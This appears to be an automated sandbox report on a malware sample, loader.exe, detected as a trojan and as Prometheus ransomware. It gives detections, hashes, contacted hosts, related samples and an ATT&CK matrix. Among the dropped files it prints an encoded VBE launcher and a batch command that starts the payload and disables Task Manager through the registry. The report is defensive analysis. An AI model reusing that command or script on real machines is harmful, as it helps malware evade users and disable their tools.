        Source: Yara matchFile source: Process Memory Space: containercomponentSaves.exe PID: 7008, type: MEMORYSTR

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information11
        Scripting        		Valid Accounts11
        Windows Management Instrumentation        		11
        Scripting        		11
        Process Injection        		1
        Masquerading        		OS Credential Dumping1
        System Time Discovery        		Remote Services11
        Archive Collected Data        		1
        Encrypted Channel        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts2
        Command and Scripting Interpreter        		1
        DLL Side-Loading        		1
        DLL Side-Loading        		1
        Modify Registry        		LSASS Memory431
        Security Software Discovery        		Remote Desktop ProtocolData from Removable Media1
        Ingress Tool Transfer        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)21
        Disable or Modify Tools        		Security Account Manager1
        Process Discovery        		SMB/Windows Admin SharesData from Network Shared Drive2
        Non-Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook141
        Virtualization/Sandbox Evasion        		NTDS141
        Virtualization/Sandbox Evasion        		Distributed Component Object ModelInput Capture2
        Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
        Process Injection        		LSA Secrets1
        Application Window Discovery        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
        Deobfuscate/Decode Files or Information        		Cached Domain Credentials1
        System Network Configuration Discovery        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
        Obfuscated Files or Information        		DCSync2
        File and Directory Discovery        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job23
        Software Packing        		Proc Filesystem46
        System Information Discovery        		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
        DLL Side-Loading        		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        loader.exe70%ReversingLabsByteCode-MSIL.Trojan.Uztuby
        loader.exe100%AviraVBS/Runner.VPG
        loader.exe100%Joe Sandbox ML

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\blockcomwinsavescrt\containercomponentSaves.exe100%AviraHEUR/AGEN.1323984
        C:\blockcomwinsavescrt\DKYQpYxB0fjo0It.vbe100%AviraVBS/Runner.VPG
        C:\blockcomwinsavescrt\containercomponentSaves.exe100%Joe Sandbox ML
        C:\blockcomwinsavescrt\containercomponentSaves.exe84%ReversingLabsByteCode-MSIL.Ransomware.Prometheus

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
        http://ip-api.com/line/?fields=hosting0%URL Reputationsafe
        http://ip-api.com0%URL Reputationsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        ip-api.com
        		208.95.112.1
        		truetrue
          		unknown
          fp2e7a.wpc.phicdn.net
          		192.229.221.95
          		truefalse
            		unknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://ip-api.com/line/?fields=hostingfalse
            • URL Reputation: safe
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namecontainercomponentSaves.exe, 00000004.00000002.1832051997.00000000030AE000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://ip-api.comcontainercomponentSaves.exe, 00000004.00000002.1832051997.00000000030B8000.00000004.00000800.00020000.00000000.sdmp, containercomponentSaves.exe, 00000004.00000002.1832051997.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, containercomponentSaves.exe, 00000004.00000002.1832051997.00000000030BE000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown

            World Map of Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public IPs

            IPDomainCountryFlagASNASN NameMalicious
            208.95.112.1
            		ip-api.comUnited States
            		53334TUT-ASUStrue

            General Information

            Joe Sandbox version:41.0.0 Charoite
            Analysis ID:1542823
            Start date and time:2024-10-26 16:16:04 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 4m 19s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:7
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:loader.exe
            Detection:MAL
            Classification:mal100.troj.evad.winEXE@11/4@1/1
            EGA Information:
            • Successful, ratio: 50%
            HCA Information:
            • Successful, ratio: 64%
            • Number of executed functions: 158
            • Number of non-executed functions: 95
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Stop behavior analysis, all processes terminated

            Warnings

            • Exclude process from analysis (whitelisted): SIHClient.exe
            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ocsp.edge.digicert.com, ctldl.windowsupdate.com
            • Execution Graph export aborted for target containercomponentSaves.exe, PID 7008 because it is empty
            • Not all processes where analyzed, report is missing behavior information
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • VT rate limit hit for: loader.exe

            Simulations

            Behavior and APIs

            TimeTypeDescription
            10:17:11API Interceptor1x Sleep call for process: containercomponentSaves.exe modified

            Joe Sandbox View / Context

            IPs

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            208.95.112.1transferencia interbancaria_667553466579.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
            • ip-api.com/line/?fields=hosting
            SecuriteInfo.com.Trojan.MulDrop28.33962.19660.9173.exeGet hashmaliciousXWormBrowse
            • ip-api.com/line/?fields=hosting
            New Order.exeGet hashmaliciousAgentTeslaBrowse
            • ip-api.com/line/?fields=hosting
            fEv4R2ahiLCQa5O.exeGet hashmaliciousAgentTeslaBrowse
            • ip-api.com/line/?fields=hosting
            PW68YarHboeikgM.exeGet hashmaliciousAgentTeslaBrowse
            • ip-api.com/line/?fields=hosting
            General Agreement.docx.exeGet hashmaliciousPython Stealer, Babadeda, Exela Stealer, Waltuhium GrabberBrowse
            • ip-api.com/json
            transferencia interbancaria_66579.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
            • ip-api.com/line/?fields=hosting
            Orden de Compra No. 78986756565344657.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
            • ip-api.com/line/?fields=hosting
            OUTSTANDING PAYMENT STATUS 01199241024.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
            • ip-api.com/line/?fields=hosting
            Circular_no_088_Annexure_pdf.htmlGet hashmaliciousHTMLPhisherBrowse
            • ip-api.com/json/?fields=status,country,regionName,city,query

            Domains

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            ip-api.comtransferencia interbancaria_667553466579.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
            • 208.95.112.1
            SecuriteInfo.com.Trojan.MulDrop28.33962.19660.9173.exeGet hashmaliciousXWormBrowse
            • 208.95.112.1
            New Order.exeGet hashmaliciousAgentTeslaBrowse
            • 208.95.112.1
            fEv4R2ahiLCQa5O.exeGet hashmaliciousAgentTeslaBrowse
            • 208.95.112.1
            PW68YarHboeikgM.exeGet hashmaliciousAgentTeslaBrowse
            • 208.95.112.1
            General Agreement.docx.exeGet hashmaliciousPython Stealer, Babadeda, Exela Stealer, Waltuhium GrabberBrowse
            • 208.95.112.1
            transferencia interbancaria_66579.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
            • 208.95.112.1
            Orden de Compra No. 78986756565344657.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
            • 208.95.112.1
            OUTSTANDING PAYMENT STATUS 01199241024.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
            • 208.95.112.1
            Circular_no_088_Annexure_pdf.htmlGet hashmaliciousHTMLPhisherBrowse
            • 208.95.112.1
            fp2e7a.wpc.phicdn.netuIBGhwqEUB.ps1Get hashmaliciousMeterpreterBrowse
            • 192.229.221.95
            https://www.google.co.uk/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/taxigiarebienhoa.vn/nini/ybmex/captcha/Z3VsYW1yYXN1bC5jaGVwdXdhbGFAY2V2YWxvZ2lzdGljcy5jb20Get hashmaliciousHTMLPhisher, Mamba2FABrowse
            • 192.229.221.95
            receipt folder.lnkGet hashmaliciousUnknownBrowse
            • 192.229.221.95
            thcdVit1dX.exeGet hashmaliciousPhorpiexBrowse
            • 192.229.221.95
            http://mychronictravel.eu.org/Get hashmaliciousUnknownBrowse
            • 192.229.221.95
            https://docs.google.com/drawings/d/1igp9x84Q_2r8qSa1YDSk9dpVvjHGWjRjQMSbSGGfj2M/preview?pli=1VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1BvGet hashmaliciousUnknownBrowse
            • 192.229.221.95
            https://louisianalaw.us/awI1AlsoTxn2APQ3EspQ3E4RAI1AoTxnz01coTxm&c=E,1,vvMSQz5CSzvUF_pnZgRSmb_4_6IhFVsFaIdJFKN2k78xDXcVLKO_NH-275AIvCQYfKD3jL3qc4bCIgEC2N6Rr4xli-ez6GBrwxbUrVz5hy4g&typo=1Get hashmaliciousUnknownBrowse
            • 192.229.221.95
            https://certify.us.com/D5QkoQ3Eniw4G2APQ3ED5QpQ3E4RAionz01coq01Get hashmaliciousUnknownBrowse
            • 192.229.221.95
            https://deborahmeagher.com.de/kfOoB/Get hashmaliciousHTMLPhisherBrowse
            • 192.229.221.95
            https://docs.google.com/drawings/d/1agK-6fGF4y65hrPDNlHipoTNyumPU-yxdwKLkQWhsQI/preview?pli=1oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEGet hashmaliciousUnknownBrowse
            • 192.229.221.95

            ASNs

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            TUT-ASUStransferencia interbancaria_667553466579.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
            • 208.95.112.1
            SecuriteInfo.com.Trojan.MulDrop28.33962.19660.9173.exeGet hashmaliciousXWormBrowse
            • 208.95.112.1
            New Order.exeGet hashmaliciousAgentTeslaBrowse
            • 208.95.112.1
            fEv4R2ahiLCQa5O.exeGet hashmaliciousAgentTeslaBrowse
            • 208.95.112.1
            PW68YarHboeikgM.exeGet hashmaliciousAgentTeslaBrowse
            • 208.95.112.1
            General Agreement.docx.exeGet hashmaliciousPython Stealer, Babadeda, Exela Stealer, Waltuhium GrabberBrowse
            • 208.95.112.1
            eETnl6XIwnGet hashmaliciousUnknownBrowse
            • 208.95.112.1
            transferencia interbancaria_66579.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
            • 208.95.112.1
            Orden de Compra No. 78986756565344657.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
            • 208.95.112.1
            OUTSTANDING PAYMENT STATUS 01199241024.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
            • 208.95.112.1

            JA3 Fingerprints

            No context

            Dropped Files

            No context

            Created / dropped Files

            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\containercomponentSaves.exe.log

            Download File
            Process:C:\blockcomwinsavescrt\containercomponentSaves.exe
            File Type:CSV text
            Category:dropped
            Size (bytes):1498
            Entropy (8bit):5.364175471524945
            Encrypted:false
            SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNCsXE4Npv:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAu
            MD5:F3E4B39D94849B092D4BB1072DD5F435
            SHA1:0D7C96B89B2901834CF0FF5EC99579B8DE65DD72
            SHA-256:BD51FDC1EF08B5BF92E800C79A01CD5783EA62FA3240505AC6AC8B5969782046
            SHA-512:C5B7C6D226EFDD26D14F55EFF6C5714ACF7452B70F29F43DC1E2BFEDA58F5883878EAFFE2B3AF060C656EA7BF99B94D9B3D3E22EF847625D5B78F60DD9DC1733
            Malicious:false
            Reputation:moderate, very likely benign file
            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

            C:\blockcomwinsavescrt\DKYQpYxB0fjo0It.vbe

            Download File
            Process:C:\Users\user\Desktop\loader.exe
            File Type:data
            Category:dropped
            Size (bytes):223
            Entropy (8bit):5.807795909818938
            Encrypted:false
            SSDEEP:6:GXkgwqK+NkLzWbHE08nZNDd3RL1wQJRXu7Nga1RJNdtu:GXkBMCzWLE04d3XBJYX1RS
            MD5:2B8D55BD0911A0D0A9B459BB97EAEEE2
            SHA1:636AE852B62D51447AC137871267120B8AF73D37
            SHA-256:200AFBF994D31CD86C1808C0387ED77D9B7D0E7759387F58D8DC849A7D30498C
            SHA-512:65BF05909EB291A66A8839EC52A386A82FF013A89A93BB0005BA29AFE71C4B74A03C75FDFA3282D3A0EDCC54598CEFDF58538D2B070BDDE44D31B61EA4B22C91
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            Reputation:low
            Preview:#@~^xgAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v,T!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJ4sKm0mWshbU/m\n/1DO&NhV\p&RMq.WWvMq~;.Iun4(AlN(R(lOEBP!S~6ls/.HEAAAA==^#~@.

            C:\blockcomwinsavescrt\containercomponentSaves.exe

            Download File
            Process:C:\Users\user\Desktop\loader.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):1490944
            Entropy (8bit):7.192193387211187
            Encrypted:false
            SSDEEP:24576:lfX0iy3dwFTQ40aI2GP1NE4utdShDpIBUx9PWRW/+YK8bnCAt:lf0iyoTQi1a1wtStlx9sY
            MD5:59E330F176AE037DCC65EFC5F7D7859A
            SHA1:F0FBB795992BBEBF15CEDEC2F473718891EC2334
            SHA-256:8CFA942FEF671BC7A15C59E2B8A0B7AEB2139D3E2BD233B1A45DE15513560D72
            SHA-512:F844DA447AFABA1620B4F883F2D14D00011428E762357479417EC8E8F60F3F0C901D06C6ACB96CE061D53EEDFE3A9F2EDB8906A2CF449A00266FC62FE0381653
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: ReversingLabs, Detection: 84%
            Reputation:low
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6......>.... ........@.. .......................@............@....................................K............................ ....................................................... ............... ..H............text...D.... ...................... ..`.sdata.../.......0..................@....rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\blockcomwinsavescrt\jwlZX38GInff6rIBqWRHehXwajI.bat

            Download File
            Process:C:\Users\user\Desktop\loader.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):164
            Entropy (8bit):4.983747816606965
            Encrypted:false
            SSDEEP:3:I5pKoDDX0YKT0XRAJArAHFDFQNBZwXD9so3KRfyM1K7eB/k+7W34hebJNAKyMhFS:I3b0nTMQsTStuH1jhRiI36BY
            MD5:460C31975A0EA04AD5A7C3730A15E570
            SHA1:E71DF06911BB1D755FA6EC7DF0B5B3C001A35554
            SHA-256:8092FB842B95A8AB9198A257585D2B8FED740B49DC013D1EB472737DABE03680
            SHA-512:3B78B82A126589DDC93A9E12777237814BED36BC135FF894B022571254F2FD3A9FAAAB0CCB30D752B11F42D537E81E92722C10FB88ED77A133AA8FFC75D4E9B1
            Malicious:false
            Reputation:low
            Preview:"C:\blockcomwinsavescrt\containercomponentSaves.exe" & reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

            Static File Info

            General

            File type:PE32 executable (GUI) Intel 80386, for MS Windows
            Entropy (8bit):7.139376589302292
            TrID:
            • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
            • Win32 Executable (generic) a (10002005/4) 49.97%
            • Generic Win/DOS Executable (2004/3) 0.01%
            • DOS Executable Generic (2002/1) 0.01%
            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
            File name:loader.exe
            File size:2'040'097 bytes
            MD5:f462fd11ceda48487db07c5b70410dac
            SHA1:48010b409ab20a6a51e562d347b87abcb15dd9fe
            SHA256:4139522809118bba10441242323550ef8f00264e862a5403dab48c1c5c8ad654
            SHA512:7ba4a2fae1b0558b4a2d1a081a9f63cc0b4184a395fe58a31083bf1e6b4e597938d0ecda8d0e45d03e26a848c1ad30c75941ade6e49f4237bb70139127c72204
            SSDEEP:24576:h2G/nvxW3WCG0xfX0iy3dwFTQ40aI2GP1NE4utdShDpIBUx9PWRW/+YK8bnCAtF:hbA3rnxf0iyoTQi1a1wtStlx9sYX
            TLSH:2C957C123B5CC945E0841AB3C2BB234447FAA8526AA9E34B77F57BAD94163C37D08DC7
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...*...._......._..'...._f.'...._..'..

            File Icon

            Icon Hash:00046a70b1290200

            Static PE Info

            General

            Entrypoint:0x41ec40
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x400000
            Subsystem:windows gui
            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Time Stamp:0x5FC684D7 [Tue Dec 1 18:00:55 2020 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major:5
            OS Version Minor:1
            File Version Major:5
            File Version Minor:1
            Subsystem Version Major:5
            Subsystem Version Minor:1
            Import Hash:fcf1390e9ce472c7270447fc5c61a0c1

            Entrypoint Preview

            Instruction
            call 00007F903D06A6F9h
            jmp 00007F903D06A10Dh
            cmp ecx, dword ptr [0043E668h]
            jne 00007F903D06A285h
            ret
            jmp 00007F903D06A87Eh
            int3
            int3
            int3
            int3
            int3
            push ebp
            mov ebp, esp
            push esi
            push dword ptr [ebp+08h]
            mov esi, ecx
            call 00007F903D05D017h
            mov dword ptr [esi], 00435580h
            mov eax, esi
            pop esi
            pop ebp
            retn 0004h
            and dword ptr [ecx+04h], 00000000h
            mov eax, ecx
            and dword ptr [ecx+08h], 00000000h
            mov dword ptr [ecx+04h], 00435588h
            mov dword ptr [ecx], 00435580h
            ret
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            lea eax, dword ptr [ecx+04h]
            mov dword ptr [ecx], 00435568h
            push eax
            call 00007F903D06D41Dh
            pop ecx
            ret
            push ebp
            mov ebp, esp
            sub esp, 0Ch
            lea ecx, dword ptr [ebp-0Ch]
            call 00007F903D05CFAEh
            push 0043B704h
            lea eax, dword ptr [ebp-0Ch]
            push eax
            call 00007F903D06CB32h
            int3
            push ebp
            mov ebp, esp
            sub esp, 0Ch
            lea ecx, dword ptr [ebp-0Ch]
            call 00007F903D06A224h
            push 0043B91Ch
            lea eax, dword ptr [ebp-0Ch]
            push eax
            call 00007F903D06CB15h
            int3
            jmp 00007F903D06EB63h
            jmp dword ptr [00433260h]
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            push 00421EB0h
            push dword ptr fs:[00000000h]

            Rich Headers

            Programming Language:
            • [ C ] VS2008 SP1 build 30729
            • [IMP] VS2008 SP1 build 30729
